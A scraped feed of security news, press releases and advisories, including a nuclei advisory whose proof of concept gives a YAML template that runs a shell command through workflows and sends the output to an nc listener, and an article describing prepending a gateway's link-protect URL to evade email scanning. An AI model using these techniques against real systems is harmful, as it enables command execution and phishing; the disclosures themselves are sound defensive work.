In Roundup before 2.4.0, classhelpers (_generic.help.html) allow XSS.

**Roundup Cross-site Scripting Vulnerability**

Moderate severity GitHub Reviewed Published Jul 17, 2024 to the GitHub Advisory Database • Updated Jul 17, 2024

GHSA-w8vc-cwv9-wx67: Roundup Cross-site Scripting Vulnerability

The tactic is not new, but there has been a steady increase in its use as of this spring.

Source: Chim via Shutterstock

Secure email gateways (SEG) do a lot to protect organizations from malware, spam, and phishing email. For some threat actors though, they also offer an attractive option for sneaking malicious mail past other SEGs.

Security researchers from Cofense this week reported observing a recent surge in attacks, where threat actors have used SEGs to encode or to rewrite malicious URLs embedded in their emails to potential victims. In many cases, when the emails arrived at their destination, SEGs allowed the malicious URLs to go through without properly vetting the link.

**The SEG Versus SEG Threat**

The reason, says Max Gannon, threat intelligence manager at Cofense, is that some secure email gateway products appear not to be handling SEG-encoded URLs properly and assume them to be always safe, when in reality they are not.

"We do not have access to the internals of SEGs, so I can't say for certain," Gannon says. "But they likely either implicitly trust the URLs or they attempt to scan them, but the domain of the SEG that encodes the URL is trusted, so the \[receiving\] SEG assumes the URL itself is legitimate."

In SEG encoding, a secure email gateway product essentially rewrites every URL in an outgoing email into a link that points to its own infrastructure. When a recipient clicks on the encoded link, the user is first directed to the sender's SEG system, which checks if the URL is safe before redirecting the user to the intended destination. The checks usually involve assessing the URL using reputation, blacklists, signatures, and other mechanisms, which means sometimes it might take an SEG days and even weeks before it designates a URL as malicious.

In these situations, problems can arise if the recipient's secure email gateway technology does not recognize an already encoded URL as needing scanning, or if the recipient's SEG scans the URL, but only sees the sending email gateway's domain and not the final destination.

"Oftentimes when SEGs detect URLs in emails that are already SEG-encoded they do not scan the URLs, or the scanning shows only the security tool's scanning page and not the actual destination," Cofense wrote in its report this week. "As a result, when an email already has SEG-encoded URLs, the recipient's SEG often allows the email through without properly checking the embedded URLs."

**A Substantial Increase**

Attackers have abused SEG encoding previously to sneak malicious emails into target environments. But there has been a substantial increase in use of the tactic in the second quarter of this year, May in particular. Cofense said.

According to the security vendor, the four email security gateways that threat actors have abused the most to encode URLs and sneak them past email defense mechanisms are VIPRE Email Security, Bitdefender LinkScan, Hornet Security Advanced Threat Protection URL Rewriting, and Barracuda Email Gateway Defense Link Protection.

Cofense said its researchers had observed attackers using these SEGs to encode malicious URLs in variously themed campaigns targeted at users protected by SEGs from a variety of vendors.

Gannon says some SEG encodings would require the threat actor to run their URL through the SEG. "Other encodings like Barracuda Link Protect would let you simply prepend their URL to the malicious URL you are trying to bypass with," he says. "For example, to use Barracuda Link Protect to bypass SEGs with the URL hxxp\[:\]//badplace\[.\]com/, I would simply add the Barracuda Link Protect URL and make it: hxxps://linkprotect\[.\]cudasvc\[.\]com/url?a=hxxp\[:\]//badplace\[.\]com/."

Gannon says one reason why threat actors likely aren't using the tactic on a much broader scale is because it involves additional work. "The biggest thing it comes down to is effort," he says. If a threat actor can take an hour to encode all the URLs in a campaign and reach 500 more inboxes, they could take the same hour and just find an additional 1,000 email addresses to send the campaign to."

Protecting against the tactic can be relatively difficult, as most SEGs don't have tuning methods for ignoring other SEG encodings, Gannon says. Therefore, the best way to combat the tactic remains user awareness and training. "A vigilant and informed employee is not going to click a link in a suspect email, even if the URL is encoded by a SEG."

**About the Author(s)**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Threat Actors Ramp Up Use of Encoded URLs to Bypass Secure Email

PRESS RELEASE

REDWOOD SHORES, Calif., July 16, 2024 /PRNewswire/ -- Tumeryk Inc., a leader in AI security solutions, proudly announces the launch of the Tumeryk AI Security Studio to enable organizations to simulate and enhance generative AI (gen AI) security. The large language model (LLM) vulnerability scanner can be run by security professionals against their gen AI API inference endpoints. The Tumeryk LLM Safety Report generated allows enterprises to discover potential gen AI risks and protect against them by building security policies in the Tumeryk Gen AI Firewall. The Gen AI Firewall is built using NVIDIA NeMo Guardrails and other state-of-the-art tools and research.

Tumeryk is also hosting a free webinar - Generative AI Security and Risk Mitigation - featuring Rohit Valia, CEO and founder of Tumeryk, and Christopher Parisien, senior manager of applied research at NVIDIA, to share how organizations can leverage Tumeryk's technologies to safely deploy gen AI-based applications into production. Sign up for the webinar enables access to the free gen AI LLM vulnerability scanner service and the Tumeryk Gen AI Security Studio.

"By making the gen AI LLM vulnerability scanner service available for free, Tumeryk is allowing organizations to get an understanding of their risk profile while using these innovative technologies and ensuring that they stay secure and compliant," said Valia. "Artificial intelligence, particularly Gen AI, holds immense transformative potential – and demand for the best security tools." 

"Gen AI presents a powerful opportunity for innovation, and organizations must approach implementations with safety in mind, especially for regulated industries. As CISOs, we need to adapt our security capabilities and operations to be inclusive of Gen AI solutions," said Puneet Thapliyal, ex-CISO at Hippocratic.ai. "Tumeryk provides the tools for enterprises to enhance gen AI security."

The Gen AI Security Studio is designed for security analysts, providing a comprehensive platform to scan LLMs and build and test gen AI Firewall policies. This proactive approach helps identify vulnerabilities and strengthens AI defenses prior to deployment. 

The Gen AI Firewall enables centralized controls over gen AI access. Security and governance teams can collaborate with developers to build sophisticated guardrails using the Gen AI Security Studio and deploy them to the Gen AI Firewall. Utilizing NVIDIA NeMo Guardrails, the Gen AI Firewall leverages heuristics to block jailbreak attempts, score hallucinations, moderate content, and orchestrate dialogs. It enables the creation of virtual silos for LLMs using role-based access control (RBAC) and enhances security through an API key vault. This firewall is crucial for maintaining the integrity and reliability of AI systems by helping ensure interactions remain within predefined security parameters.

The AI Security Monitoring Dashboard offers a single pane of glass for monitoring LLMs across cloud providers. This allows operations teams to monitor the performance of gen AI applications and review comprehensive logs and alerts to ensure any deviations from expected behavior are promptly addressed. 

The free LLM scanner and Gen AI Security Studio can be accessed from the AWS Marketplace or https://tumeryk.com/, providing easy access for organizations looking to enhance their AI security posture. Tumeryk AI solutions represent a significant advancement in AI security, offering a holistic approach to managing the complexities of gen AI. As AI continues to integrate deeper into business operations, Tumeryk Inc. remains at the forefront of ensuring these systems are secure, reliable, and aligned with organizational policies.

About Tumeryk Inc.

Tumeryk Inc. is a pioneering company in AI security solutions, dedicated to developing innovative technologies that safeguard AI systems. With a focus on proactive risk management and comprehensive protection strategies, Tumeryk Inc. enables organizations to deploy AI with confidence and integrity.

You May Also Like

Tumeryk Inc. Launches With Free Gen AI LLM Vulnerability Scanner

PRESS RELEASE

CHICAGO, July 16, 2024 /PRNewswire/ -- Research from MxD (Manufacturing x Digital), the digital manufacturing institute and the National Center for Cybersecurity in Manufacturing supported by the Department of Defense, has revealed an urgent need for the U.S. manufacturing sector to strengthen its cybersecurity posture.

The report, titled Behind the Firewall, establishes the sector's cybersecurity preparedness and finds that manufacturers are overestimating their capabilities.  

Securing U.S. manufacturing has emerged as an economic and national security priority as the manufacturing sector remains the most targeted sector worldwide for cyber-attacks. Faced with unique challenges in securing business operations against geopolitical threats, the report shares insights and strategies for manufacturers to enhance their cyber resilience.

The survey found:

*   76% of manufacturers are confident their organization can prevent cyber risks and respond to cyber-attacks
    
*   Only 34% of manufacturers have comprehensive system security plans (SSPs) in place - a fundamental cybersecurity requirement and often required for compliance
    
*   Just 43% of all manufacturers have a dedicated cybersecurity leader, such as a Chief Information Security Officer (CISO) or Director of Cybersecurity
    
    *   The disparity is stark when compared by size: 88% of large manufacturers (500+ employees) have such leaders, compared to 35% of small- and medium-sized manufacturers (fewer than 500 employees)
        
    
*   Encouragingly, 82% of manufacturers are planning to raise cybersecurity spending in the upcoming budget cycle
    

"The supply chains which support U.S. manufacturing are only as strong as their weakest link. We must strengthen at every level to ensure a resilient domestic manufacturing capability, including within the defense industrial base," said MxD CEO Berardino Baratta. "We see a sense of overconfidence in our research results, which is concerning given that everyone is at risk, from the largest multinational to small- and medium-sized manufacturers who often lack the proper resources to protect themselves from cyber-attacks."

"Manufacturing sector cyber-attacks are no longer rare, one-off events," said MxD Director of Cybersecurity Michael Tanji. "The rise in incidents shows repeated and concerted efforts to steal IP or other company data, resulting in production shutdowns, logistical delays, and more. Our manufacturing sector must stay ahead of these growing threats – and we can only do that by updating and upgrading cyber capabilities across the industry."

This survey identifies key areas where manufacturers can benefit from additional resources to strengthen their cybersecurity infrastructure. Research results were segmented by vertical sector and manufacturer size, which allows for a deeper understanding of needs and insights at all levels of the manufacturing sector. In turn, this enables MxD to develop tools, like cyber playbooks and training guides, which more effectively address sector needs. 

This report launches as MxD reaches its 10-year anniversary and underscores the imperative for strengthening U.S. manufacturing competitiveness and resiliency. As a public-private partnership, MxD convenes and collaborates with manufacturers to prepare and protect domestic supply chains against cybersecurity threats.

About MxD  
MxD (Manufacturing x Digital) advances economic prosperity and national security by strengthening U.S. manufacturing competitiveness through technology innovation, workforce development, and cybersecurity preparedness. In partnership with the Department of Defense, we convene an ecosystem to solve critical manufacturing challenges by accelerating digital adoption, empowering a skilled workforce, and modernizing supply chains. MxD is also the National Center for Cybersecurity in Manufacturing as designated by DoD. Visit mxdusa.org to learn more.

You May Also Like

MxD Research Reveals Major Disconnect Between Perceived and Actual Cybersecurity Capabilities in US Manufacturing

PRESS RELEASE

BETHESDA, Md., July 16, 2024 /PRNewswire-PRWeb/ -- As organizations continue to fortify their cybersecurity strategies in response to an ever-evolving threat landscape, many are turning to Zero Trust architectures to safeguard their data. However, implementing Zero Trust is not without its challenges. According to a new strategy guide from the SANS Institute, "Navigating the Path to a State of Zero Trust in 2024," businesses often stumble over key obstacles in their journey towards Zero Trust adoption.

"The path to achieving a true state of Zero Trust isn't straightforward. Organizations often encounter several fundamental challenges when attempting to implement end-to-end Zero Trust principles across their environment," said Ismael Valenzuela, SANS Senior Instructor and author of the Cyber Defense and Blue Team Operations course, SANS SEC530: Defensible Security Architecture and Engineering. "By understanding and addressing these common mistakes, businesses can make better strategic and tactical decisions and increase their resiliency in the face of evolving threats."

Here are the top five mistakes identified:

● Overlooking the Importance of Organizational Culture: Zero Trust is more than just a technological shift; it requires a fundamental change in organizational culture. Chief Information Security Officers (CISOs) must align security with strategic, operational, and financial priorities. As the strategy guide states, "Effective security is driven by people, processes, and technology." Failure to secure stakeholder buy-in from the outset can doom Zero Trust initiatives to fail.

● Underestimating Human Risk: Employee error and negligence account for over 80% of data breaches. Hybrid work environments blur the lines between personal and professional spaces, increasing the complexity of monitoring user activity. "A Zero Trust architecture is an important line of defense against human risk," the strategy guide emphasizes. Organizations must implement continuous monitoring and real-time assessment of user behavior to mitigate these risks.

● Neglecting the Supply Chain: Recent high-profile supply chain attacks have underscored the vulnerabilities within interconnected systems. According to Gartner, by 2025, 45% of organizations worldwide will have experienced attacks on their supply chains. Zero Trust principles help limit the impact of these breaches by ensuring continuous verification and deeper visibility into user activity.

● Failing to Plan for Sustainable Success: Implementing Zero Trust is a long-term commitment that requires continuous improvement and adaptation. The SANS strategy guide highlights the importance of effective change management practices: "Effective change management ensures stakeholder buy-in, facilitates user adoption, minimizes disruption, promotes continuous improvement, and enhances collaboration."

● Inadequate Measurement of Success: Measuring the effectiveness of a Zero Trust framework is crucial for maintaining stakeholder support. The guide suggests several metrics, including authentication success rates, policy compliance rates, and the time to detect and respond to incidents. These metrics provide a clear picture of the framework's impact and highlight areas for improvement.

"Adopting the Zero Trust 'never trust, always verify' mindset is essential for modern cybersecurity," said Valenzuela. "However, the real challenge lies in having a realistic understanding of what a Zero Trust architecture looks like and avoiding common pitfalls during implementation. From cultural shifts to technical deployments, this offers vital guidance to help organizations successfully navigate the complexities of Zero Trust and enhance their cybersecurity resilience."

For more information on implementing Zero Trust and to download the full strategy guide, visit: https://www.sans.org/u/1xo2

Top 5 Mistakes Businesses Make When Implementing Zero Trust

PRESS RELEASE

NEW YORK, July 16, 2024 /PRNewswire/ -- Today QBE Insurance, a global insurer operating in 27 countries, unveiled QCyberProtect, a comprehensive and globally consistent cyber policy designed to enhance cyber resilience for a broad range of clients worldwide.

QCyberProtect provides tailored coverage for losses arising from current and emerging cyber risks, including, but not limited to, network security, privacy liability, IT and non-IT business interruptions and reputational loss.

"Strategic investments in our cyber capabilities have strengthened our ability to shield our clients from the most pressing cyber threats," said Andrew Horton, Group CEO of QBE Insurance. "This offering highlights our commitment to delivering globally consistent and practical solutions that address the ever-evolving cyber risks our customers face around the world."

QCyberProtect provides cyber insurance for a range of organizations, from mid-sized companies relying on fully outsourced IT departments to global corporations with complex large-scale IT systems.

"QBE's global cyber policy is supported by a network of highly skilled cyber experts and strategic partners to ensure world-class coverage and service," said Serene Davis, QBE Global Head of Cyber. "We are providing our customers with the comprehensive coverage and services they need to navigate end-to-end cybersecurity issues."

Along with its global cyber insurance coverage, QBE is also implementing QCyberPrepare. Available in many locations around the world, QCyberPrepare is a cyber saferoom where cyber customers can launch their incident response plan in a secure platform with secure messaging. This risk management tool empowers organizations to be connected, confident and in control before, during and after a cyber crisis.

QCyberProtect is currently available in Australia, Hong Kong, Malaysia, Netherlands, Singapore, Sweden, UAE, United Kingdom, United States and Vietnam and will be launching in additional countries throughout the year.

For more information about QCyberProtect visit Cyber | QBE US. Contact your regional underwriter for more information regarding appetite.

About QBE North America

QBE North America is a global insurance leader helping customers solve unique risks, so they can stay focused on their future. Part of QBE Insurance Group Limited, QBE North America reported Gross Written Premiums in 2023 of $7.6 billion. QBE Insurance Group's results can be found at qbe.com. Headquartered in Sydney, Australia, QBE operates out of 27 countries around the globe, with a presence in every key insurance market. The North America division, headquartered in New York, conducts business primarily through its insurance company subsidiaries. The actual terms and conditions of any insurance coverage are subject to the language of the policies as issued. Additional information can be found at qbe.com/us or follow QBE North America on LinkedIn, Facebook and Instagram.

QBE Insurance Launches Global Cyber Coverage With QCyberProtect

PRESS RELEASE

BOSTON, July 16, 2024 /PRNewswire/ -- Cybercrimes like dealer system hacks, identity theft, and breaches are wreaking havoc on the auto industry. As the industry becomes more technology-driven, increasingly sophisticated cybercriminals are finding more opportunities to strike. In fact, the auto sector is now the third most targeted behind healthcare and financial services. The recent attacks against Findlay Auto Group and CDK Global are just two of many examples that have brought attention to the industry's vulnerabilities.

A number of regulations have been issued to ensure dealers adequately protect consumer data. In particular, the Red Flags Rule requires dealers to implement programs to protect customers from potential identity theft and fraud.

That's why Aura, the all-in-one consumer online safety solution, today announced its partnership with Mosaic Compliance Services to provide identity protection to anyone who gives dealers personally identifiable information (PII) during the car-buying process.

Mosaic is a leader in helping dealerships nationwide implement legally defensible and insurable compliance systems. By combining Aura's award-winning identity theft protection services with Mosaic's industry-leading fully managed compliance solutions, this partnership helps dealers adhere to the Red Flags Rule regulations, mitigate risk, and provide proactive protection from cybercrime for their roofs, shoppers, and buyers.

"We partnered with Aura so that every consumer, shopper, or buyer gets identity theft protection simply because they gave the dealer their non-public personal information," said James S. Ganther, Esq., CEO at Mosaic Compliance Services. "Through this collaboration, we're able to both provide peace of mind to buyers whose information is collected and ease the compliance burden for dealers–providing everything from counsel on policies to operational improvements, audits, and consumer online protections."

Aura plays a crucial role in the mitigation piece of compliance with the Red Flags Rule. With these regulations, auto dealers are now obligated to protect the personal information provided to them. By offering Aura to consumers, dealers help proactively mitigate fraudby monitoring for instances of identity theft, credit misuse, and financial fraud.

"With cyber attacks, scams, and breaches happening every day, car buyers are aware of the risk associated with providing their personal information to companies," said Scott Hudson, Senior Vice President of Sales at Aura. We know that 84% of customers say they would not buy another vehicle from a dealership if a breach compromised their data. By offering Aura's identity protection solution to every consumer who provides personally identifiable information, dealers can earn trust upfront in the car-buying process."

Aura works with hundreds of dealerships across the U.S. to offer identity and fraud protection to hundreds of thousands of consumers. If you're interested in partnering with Aura and Mosaic Compliance Services, contact \[email protected\].

ABOUT AURA   
Aura is one of the fastest growing online safety solutions for individuals and families. Whether you're protecting yourself, your kids, or your aging loved ones, Aura can meet your needs at every stage of life. Customers trust Aura's simple interface to effortlessly safeguard the things they care about most. Through real-time monitoring and alerts, Aura helps detect and mitigate emerging online threats, such as scams, predators and cyberbullying. To discover how Aura is reshaping online safety for people everywhere, visit www.aura.com.

ABOUT MOSAIC COMPLIANCE SERVICES   
Mosaic Compliance Services was founded in 2006 by automotive attorneys who saw the need to make compliance more approachable and effective for dealerships. Today, Mosaic is a leading provider of compliance solutions for dealers. Serving over 150,000 active users, we help dealerships across the country implement a culture of compliance that includes processes, training, policies, certifications, safeguards, audits, and more. Our web-based legal compliance training has received the Dealers' Choice Diamond Award eight years in a row, including 2023. In everything we do Mosaic strives to provide the most knowledgeable service and tailored guidance in the industry. As your dedicated compliance partner, our goal is your success.

Aura Partners With Mosaic Compliance Services to Launch a Program to Protect Auto Dealers and Buyers From Cybercrime

### Summary
Find a way to execute code template without -code option and signature.

### Details
write a `code.yaml`:
```yaml
id: code

info:
  name: example code template
  author: ovi3


code:
  - engine:
      - sh
      - bash
    source: |
      id

http:
  - raw:
      - |
        POST /re HTTP/1.1
        Host: {{Hostname}}

        {{code_response}}

workflows:
  - matchers:
    - name: t
```

using nc to listen on 80:
```bash
nc -lvvnp 80
```

execute PoC template with nuclei:
```bash
./nuclei -disable-update-check  -w code.yaml -u http://127.0.0.1 -vv -debug
```
and nc will get `id` command output.

We use `-w` to specify a workflow file, not `-t` to template file. and notice there is a `workflows` field in code.yaml to pretend to be a workflow file.

Test in Linux and Nuclei v3.2.9

### Impact
Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web applications use -t to execute)


**Summary**

Find a way to execute code template without -code option and signature.

**Details**

write a code.yaml:

id: code

info:
  name: example code template
  author: ovi3

code:
  - engine:
      - sh
      - bash
    source: |
      id
http:
  - raw:
      - |
        POST /re HTTP/1.1
        Host: {{Hostname}}
        {{code\_response}}
workflows:
  - matchers:
    - name: t

using nc to listen on 80:

execute PoC template with nuclei:

./nuclei -disable-update-check  -w code.yaml -u http://127.0.0.1 -vv -debug

and nc will get id command output.

We use -w to specify a workflow file, not -t to template file. and notice there is a workflows field in code.yaml to pretend to be a workflow file.

Test in Linux and Nuclei v3.2.9

**Impact**

Some web applications inherit from Nuclei and allow users to edit and execute workflow files. In this case, users can execute arbitrary commands. (Although, as far as I know, most web applications use -t to execute)

**References**

*   GHSA-c3q9-c27p-cw9h
*   https://nvd.nist.gov/vuln/detail/CVE-2024-40641

GHSA-c3q9-c27p-cw9h: projectdiscovery/nuclei allows unsigned code template execution through workflows

North Korean espionage campaign delivers updated BeaverTail info stealer by spoofing legitimate video calling service, researcher finds.

Source: Mykhailo Polenok via Alamy

Well known for targeting victims with fake job postings, North Korea state-sponsored hackers have been discovered using a new variant of their BeaverTail malware to trick macOS users into downloading a malicious version of Microtalk, a video-calling service.

Details about the latest campaign were published by cybersecurity researcher Patrick Wardle, who explained in his writeup that the threat actors likely lured their victims into downloading the updated BeaverTail-infected version of Microtalk by asking them to join a job interview.

"Yes, even the cloned site states that you can 'start your next video call with a single click. No download … is required,' but I guess, who reads the fine print?" Wardle wrote.

In addition to stealing data from the victim's device, BeaverTail also executes additional payloads, including InvisibleFerret, the report added.

"The North Korean hackers are a wily bunch and are quite adept at hacking macOS targets, even though their technique\[s\] often rely on social engineering (and thus from a technical point of view are rather unimpressive)," Wardle said.

**About the Author(s)**

DPRK Hackers Tweak Malware to Lure MacOS Users into Video Calls

Versions before 0.7.0 of vodozemac use a non-constant time base64 implementation for importing key material for Megolm group sessions and `PkDecryption` Ed25519 secret keys. This flaw might allow an attacker to infer some information about the secret key material through a side-channel attack.

### Impact

The use of a non-constant time base64 implementation might allow an attacker to observe timing variations in the encoding and decoding operations of the secret key material. This could potentially provide insights into the underlying secret key material.

The impact of this vulnerability is considered low because exploiting the attacker is required to have access to high precision timing measurements, as well as repeated access to the base64 encoding or decoding processes.  Additionally, the estimated leakage amount is bounded and low according to the referenced paper.

### Patches

The patch is in commit 734b6c6948d4b2bdee3dd8b4efa591d93a61d272.

### Workarounds
None.

### References
A detailed description of the precise attack can be found at https://arxiv.org/abs/2108.04600. We kindly thank Soatok for pointing out this research to us.

### For more information
If you have any questions or comments about this advisory please email us at [security at matrix.org](mailto:security@matrix.org).


Versions before 0.7.0 of vodozemac use a non-constant time base64 implementation for importing key material for Megolm group sessions and PkDecryption Ed25519 secret keys. This flaw might allow an attacker to infer some information about the secret key material through a side-channel attack.

**Impact**

The use of a non-constant time base64 implementation might allow an attacker to observe timing variations in the encoding and decoding operations of the secret key material. This could potentially provide insights into the underlying secret key material.

The impact of this vulnerability is considered low because exploiting the attacker is required to have access to high precision timing measurements, as well as repeated access to the base64 encoding or decoding processes. Additionally, the estimated leakage amount is bounded and low according to the referenced paper.

**Patches**

The patch is in commit 734b6c6948d4b2bdee3dd8b4efa591d93a61d272.

**Workarounds**

None.

**References**

A detailed description of the precise attack can be found at https://arxiv.org/abs/2108.04600. We kindly thank Soatok for pointing out this research to us.

**For more information**

If you have any questions or comments about this advisory please email us at security at matrix.org.

**References**

*   GHSA-j8cm-g7r6-hfpq
*   matrix-org/vodozemac@734b6c6
*   matrix-org/vodozemac@77765da
*   https://arxiv.org/abs/2108.04600

Latest News